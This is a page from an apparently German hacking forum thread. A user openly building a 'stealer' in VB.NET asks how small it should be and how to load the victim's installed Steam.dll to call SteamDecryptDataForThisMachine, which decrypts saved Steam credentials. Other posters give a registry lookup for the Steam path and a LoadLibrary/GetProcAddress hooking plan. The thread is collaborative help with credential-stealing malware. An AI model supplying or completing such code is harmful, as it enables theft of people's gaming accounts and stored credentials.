Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 11
  1. #1
    Capt'n Crunch Avatar von hackerking
    Registriert seit
    08.11.2008
    Beiträge
    964

    Frage [VB.NET] Wie groß Datei & DLL in anderem Ordner

    Jo Hey Leute. Ich hätte mal so ein paar Fragen:

    Als erstes, wie groß ein stealer maximal so sein sollte...

    als zweites, ob ich i-wie die z. B. steamDLL wegglassen kann und einfach prüfen kann ob sie exestiert (z. B. in C:\Program Files\Steam\Steam.dll) und dann von daraus auf diese dll zugreifen.. weil sonst ist der stealer ganze 3 mb fetter
    Geändert von hackerking (13.06.2009 um 19:23 Uhr)

  2. #2
    Der Jesus der Informatik
    Registriert seit
    01.12.2007
    Beiträge
    216

    Standard

    Zu 1.: So klein wie möglich

    2:
    Natürlich geht das. Denn wenn Steam installiert ist, ist auch die DLL vorhanden. Du kannst dann die Funktion ganz normal vom Pfad dieser DLL aufrufen.






  3. #3
    Capt'n Crunch Avatar von hackerking
    Registriert seit
    08.11.2008
    Beiträge
    964

    Standard

    Das Problem ist ja das ich feste Strings benutzen muss. (Also für Subs.) Ich kann den Dll aufruf nicht ändern... also den pfad...
    Ich mach es ja so:

    Code:
        <DllImport("Steam.dll", CallingConvention:=CallingConvention.Cdecl)> _
    Public Function SteamDecryptDataForThisMachine(ByVal encryptedData As String, ByVal encryptedDataSize As Integer, ByVal decryptedBuffer As StringBuilder, ByVal decryptedBufferSize As Integer, ByRef decryptedDataSize As Integer) As Integer
        End Function

  4. #4
    Der Jesus der Informatik
    Registriert seit
    01.12.2007
    Beiträge
    216

    Standard

    Mit .NET kenn ich mich jetzt nicht aus und ich denke auch nicht, dass man damit Funktionen per Pointer aufrufen kann. Sonst könntest du es mit LoadLibrary und GetProcAddress machen.






  5. #5
    Richard Stallman Avatar von Sawyer
    Registriert seit
    26.07.2008
    Beiträge
    2.037

    Standard

    als zweites, ob ich i-wie die z. B. steamDLL wegglassen kann und einfach prüfen kann ob sie exestiert (z. B. in C:\Program Files\Steam\Steam.dll) und dann von daraus auf diese dll zugreifen.. weil sonst ist der stealer ganze 3 mb fetter
    Code:
            If My.Computer.FileSystem.FileExists(My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Valve\Steam", "InstallPath", String.Empty) & "\Steam.dll") = True Then
                ' Datei ist Vorhanden
            End If
    MfG

  6. #6
    Capt'n Crunch Avatar von hackerking
    Registriert seit
    08.11.2008
    Beiträge
    964

    Standard

    Wofür soll das jetzt gut sein?^^

  7. #7
    Richard Stallman Avatar von Sawyer
    Registriert seit
    26.07.2008
    Beiträge
    2.037

    Standard

    Wofür soll das jetzt gut sein?^^
    Du hast gefragt wie man Prüfen kann ob die Steam.dll auf dem System vorhanden ist , hier ist die Lösung^^

  8. #8
    Capt'n Crunch Avatar von hackerking
    Registriert seit
    08.11.2008
    Beiträge
    964

    Standard

    Das kann ich auch^^
    und dann von daraus auf diese dll zugreifen
    ,
    Das kann ich nich xD

  9. #9
    Richard Stallman Avatar von Sawyer
    Registriert seit
    26.07.2008
    Beiträge
    2.037

    Standard

    Das hier sieht vielversprechend aus zur Lösung deines Problems http://www.microsoft.com/communities...&cr=&sloc=&p=1

    MfG

  10. #10
    Der Jesus der Informatik
    Registriert seit
    01.12.2007
    Beiträge
    216

    Standard

    Ich hatte mit diesem Problem auch schon unter VB6 zu kämpfen und ich hatte eine Idee, wie man vorgehen könnte um Funktionspointer aufrufen zu können. Keine Ahung ob es funtzt, da ich es noch nicht getestet habe, aber auf Anhieb fällt mir kein Fehler auf deswegen poste ich sie einfach mal in der Hoffnung, dass du es gebrauchen kannst:

    1. Funktionspointer der aufzurufenden Funktion holen mit GetProcAddress und LoadLibraryA
    2. API, die nicht von Programm aufgerufen wird, auf den Funktionspointer umleiten (Hook)
    3. Gehookte API im Programm mit der Parameteranzahl und dem Parametertyp der gewünschten Zielfunktion deklarieren

    Nun müsstest du die Funktion komfortabel aus dem Programm aufrufen können. Denn immer wenn du die Funktion im Programm aufrufst, wird die Funktion auf die gewünschte Zielfunktion umgeleitet (in deinem Fall eine Funktion aus der Steam.dll)

    Hoffentlich hab ich keinen Denkfehler gemacht

    Ups da war der Papst wohl schneller . Ich denke seine Lösung wird komfortabler sein xD
    Geändert von DizzY_D (13.06.2009 um 21:24 Uhr)






Seite 1 von 2 12 LetzteLetzte

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •